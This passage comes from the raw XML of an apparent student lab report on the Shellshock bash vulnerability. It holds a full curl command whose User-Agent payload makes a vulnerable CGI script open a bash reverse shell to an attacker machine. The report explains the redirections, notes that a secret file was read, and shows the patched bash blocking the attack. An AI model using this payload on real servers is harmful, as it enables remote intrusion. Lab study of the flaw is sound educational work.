      <w:r w:rsidR="00325C9F" w:rsidRPr="00325C9F">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00325C9F" w:rsidRPr="00325C9F">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00325C9F" w:rsidRPr="00325C9F">
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00325C9F" w:rsidRPr="00325C9F">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00325C9F" w:rsidRPr="00325C9F">
        <w:t>/10.0.2.4/9080 0&lt;&amp;1 2&gt;&amp;1 " http://10.0.2.15/cgi-bin/myprog.cgi</w:t>
      </w:r>
      <w:r w:rsidR="00325C9F">
        <w:t xml:space="preserve"> , I got the reverse shell and also verified by checking the IP from the shell, which showed the attacker IP and also opened the secret.txt file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79067496" w14:textId="07B3A90A" w:rsidR="00463ACE" w:rsidRDefault="00463ACE" w:rsidP="0092418D"/>
    <w:p w14:paraId="12689291" w14:textId="68F3AE08" w:rsidR="00463ACE" w:rsidRDefault="00463ACE" w:rsidP="0092418D">
      <w:r w:rsidRPr="008E2195">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00325C9F">
        <w:t>This was due to shellshock vulnerability on the server side. I have setup the attack as below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67684BA9" w14:textId="07F47B17" w:rsidR="00325C9F" w:rsidRDefault="00325C9F" w:rsidP="00325C9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Attacker): Started the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on port 9080 </w:t>
      </w:r>
      <w:r w:rsidR="008E2195">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> listen</w:t>
      </w:r>
      <w:r w:rsidR="008E2195">
        <w:t>ing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4922E923" w14:textId="60AD202C" w:rsidR="008E2195" w:rsidRDefault="008E2195" w:rsidP="00325C9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Attacker): Executed the curl with payload as: </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2195">
        <w:t xml:space="preserve">﻿curl -A "() { echo Hack;}; echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2195">
        <w:t>Content_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2195">
        <w:t>: text/plain; echo ; /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2195">
        <w:t>bash_shellshock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2195">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2195">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2195">
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2195">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2195">
        <w:t xml:space="preserve">/10.0.2.4/9080 0&lt;&amp;1 2&gt;&amp;1 " </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00C311EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.0.2.15/cgi-bin/myprog.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26D09A7F" w14:textId="6632EAEF" w:rsidR="008E2195" w:rsidRDefault="008E2195" w:rsidP="008E2195">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2195">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2195">
        <w:t>bash_shellshock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>invoked</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the input, output and error are directed to attacker machine by defining the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2195">
        <w:t>/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2195">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2195">
        <w:t>/10.0.2.4/9080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6BCC95" w14:textId="7B5A6932" w:rsidR="008E2195" w:rsidRDefault="008E2195" w:rsidP="008E2195">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“&gt;” represents in Unix, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the file descriptor is 1, and will sends to TCP connection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D703AE7" w14:textId="713843B6" w:rsidR="008E2195" w:rsidRDefault="008E2195" w:rsidP="008E2195">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“0&lt;&amp;1” represents stdin and which gets from TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F02F3BA" w14:textId="4EECF146" w:rsidR="008E2195" w:rsidRDefault="008E2195" w:rsidP="008E2195">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“2&gt;&amp;1” represents stderr and sends to TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1D1FEF" w14:textId="77777777" w:rsidR="009B07B4" w:rsidRDefault="008E2195" w:rsidP="008E2195">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Server Side): No action done at this, other than initial setup of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> program but running on unpatched bash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D3F457" w14:textId="52E23521" w:rsidR="008E2195" w:rsidRDefault="008E2195" w:rsidP="009B07B4">
      <w:r>
        <w:t>By performing the above steps, the /</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2195">
        <w:t>bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2195">
        <w:t>bash_shellshock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has been invoked and as it directed to take stdin, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, stderr to/from TCP connection, which is attacker machine. And as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attacker I am listening for the traffic on port 9080 using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I got the reverse shell and where I can use the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E3D7F0" w14:textId="77777777" w:rsidR="00463ACE" w:rsidRDefault="00463ACE" w:rsidP="0092418D"/>
    <w:p w14:paraId="6040995D" w14:textId="52320900" w:rsidR="00463ACE" w:rsidRPr="00EF7225" w:rsidRDefault="00463ACE" w:rsidP="0092418D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7225">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 6:</w:t>
      </w:r>
      <w:r w:rsidR="006E1A8D" w:rsidRPr="00EF7225">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E1A8D" w:rsidRPr="00EF7225">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using the Patched Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCCBBEB" w14:textId="72520680" w:rsidR="00463ACE" w:rsidRDefault="00463ACE" w:rsidP="0092418D"/>
    <w:p w14:paraId="4FD05E6D" w14:textId="665188DB" w:rsidR="00463ACE" w:rsidRDefault="00463ACE" w:rsidP="0092418D">
      <w:r w:rsidRPr="00463ACE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B1A4D43" wp14:editId="5FCD6967">
            <wp:extent cx="5438140" cy="2960183"/>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9096" cy="2966147"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FC1DBC" w14:textId="77777777" w:rsidR="00327C85" w:rsidRDefault="00327C85" w:rsidP="0092418D"/>
    <w:p w14:paraId="5837D3BC" w14:textId="430DAFE1" w:rsidR="00463ACE" w:rsidRDefault="00463ACE" w:rsidP="0092418D">
      <w:r w:rsidRPr="00463ACE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="307549CC" wp14:editId="254BAC12">
            <wp:extent cx="5438274" cy="2960257"/>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317" cy="2961369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F212ADE" w14:textId="36768893" w:rsidR="00327C85" w:rsidRDefault="00327C85" w:rsidP="0092418D"/>
    <w:p w14:paraId="4BA257E9" w14:textId="348BE82E" w:rsidR="00323FB0" w:rsidRDefault="00327C85" w:rsidP="0092418D">
      <w:r w:rsidRPr="00EF7225">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Created a new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> program </w:t>
      </w:r>
      <w:r w:rsidR="00323FB0">
        <w:t xml:space="preserve">with patched version of bash shell (/bin/bash) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for printing the env variables </w:t>
      </w:r>
      <w:r w:rsidR="00323FB0">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00323FB0" w:rsidRPr="00323FB0">
        <w:t>﻿</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00323FB0" w:rsidRPr="00323FB0">
        <w:t>myprog_fix.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00323FB0">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>and also for reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="00323FB0">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00323FB0" w:rsidRPr="00323FB0">
        <w:t>﻿</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00323FB0" w:rsidRPr="00323FB0">
        <w:t>myprog_envFix.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00323FB0">
        <w:t>). When tried the attack this time, the environment variable was success, but the reverse shell attack was failed</w:t>
      </w:r>
      <w:r w:rsidR="00CD5C76">
        <w:t xml:space="preserve"> – just printed the Hello World. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2168ECD1" w14:textId="5151C11A" w:rsidR="00323FB0" w:rsidRDefault="00323FB0" w:rsidP="0092418D"/>
    <w:p w14:paraId="4869DE9B" w14:textId="3111C437" w:rsidR="00323FB0" w:rsidRDefault="00323FB0" w:rsidP="0092418D">
      <w:r w:rsidRPr="00EF7225">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00CD5C76">
        <w:t>The environment variable one for user agent was controlled from client side, so it just took and printed what was sent. Whereas for reverse shell, the malicious code to invoke the bash</w:t>
      </w:r>
      <w:r w:rsidR="00D07958">
        <w:t xml:space="preserve"> was handled by the patched bash, where it will </w:t>
      </w:r>
      <w:r w:rsidR="00D07958" w:rsidRPr="00D07958">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidR="00D07958">
        <w:t xml:space="preserve"> parse it as shell function and so the attack was defended by the remote server. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00323FB0" w:rsidSect="00E37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ƒ1œ˛">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="020B0604020202020204"/>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13715"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="320A2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0131C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="669042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8B2"/>
    <w:rsid w:val="000205DE"/>
    <w:rsid w:val="0007352C"/>
    <w:rsid w:val="000A604F"/>
    <w:rsid w:val="000D741E"/>
    <w:rsid w:val="001A01C3"/>
    <w:rsid w:val="001C391D"/>
    <w:rsid w:val="001F253F"/>
    <w:rsid w:val="00261F47"/>
    <w:rsid w:val="002E585B"/>
    <w:rsid w:val="003048A9"/>
    <w:rsid w:val="00323FB0"/>
    <w:rsid w:val="00325C9F"/>
    <w:rsid w:val="00327C85"/>
    <w:rsid w:val="003360AA"/>
    <w:rsid w:val="003534A6"/>
    <w:rsid w:val="00380109"/>
    <w:rsid w:val="00386C02"/>
    <w:rsid w:val="00396097"/>
    <w:rsid w:val="003A5DEA"/>
    <w:rsid w:val="003D4BF4"/>
    <w:rsid w:val="003D52FC"/>
    <w:rsid w:val="003E7AED"/>
    <w:rsid w:val="00450834"/>
    <w:rsid w:val="00463ACE"/>
    <w:rsid w:val="004F300B"/>
    <w:rsid w:val="004F735C"/>
    <w:rsid w:val="005138FF"/>
    <w:rsid w:val="006A57A6"/>
    <w:rsid w:val="006B7935"/>
    <w:rsid w:val="006E1A8D"/>
    <w:rsid w:val="00726AF5"/>
    <w:rsid w:val="007328B2"/>
    <w:rsid w:val="008415BB"/>
    <w:rsid w:val="008817B7"/>
    <w:rsid w:val="00887929"/>
    <w:rsid w:val="008C4020"/>
    <w:rsid w:val="008D1F99"/>
    <w:rsid w:val="008E2195"/>
    <w:rsid w:val="0092418D"/>
    <w:rsid w:val="0093018D"/>
    <w:rsid w:val="00961482"/>
    <w:rsid w:val="009B07B4"/>
    <w:rsid w:val="009B173C"/>
    <w:rsid w:val="009E3329"/>
    <w:rsid w:val="009E66D6"/>
    <w:rsid w:val="00B052F4"/>
    <w:rsid w:val="00B30992"/>
    <w:rsid w:val="00B765C4"/>
    <w:rsid w:val="00CC197D"/>
    <w:rsid w:val="00CD5C76"/>
    <w:rsid w:val="00D02DBE"/>
    <w:rsid w:val="00D07958"/>
    <w:rsid w:val="00DC69A1"/>
    <w:rsid w:val="00DE4537"/>
    <w:rsid w:val="00DF4888"/>
    <w:rsid w:val="00E04154"/>
    <w:rsid w:val="00E04C81"/>
    <w:rsid w:val="00E159E9"/>
    <w:rsid w:val="00E37385"/>
    <w:rsid w:val="00E605F1"/>
    <w:rsid w:val="00E9238E"/>
    <w:rsid w:val="00EF289E"/>
    <w:rsid w:val="00EF3BFA"/>
    <w:rsid w:val="00EF7225"/>
    <w:rsid w:val="00F27BAF"/>
    <w:rsid w:val="00F45D80"/>
    <w:rsid w:val="00F8114D"/>
    <w:rsid w:val="00FC5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85960"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8E01E51A-986B-4443-91FF-B4BA7FED5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1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418D"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E2195"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E2195"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E041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lculator.net/hex-calculator.html?number1=bffff0d0&amp;c2op=-&amp;number2=bffff074&amp;calctype=op&amp;x=28&amp;y=12"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10.0.2.15/cgi-bin/myprog.cgi"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15</Pages>
  <Words>1532</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Karumudi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bharath Karumudi</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-26T21:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-02T03:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>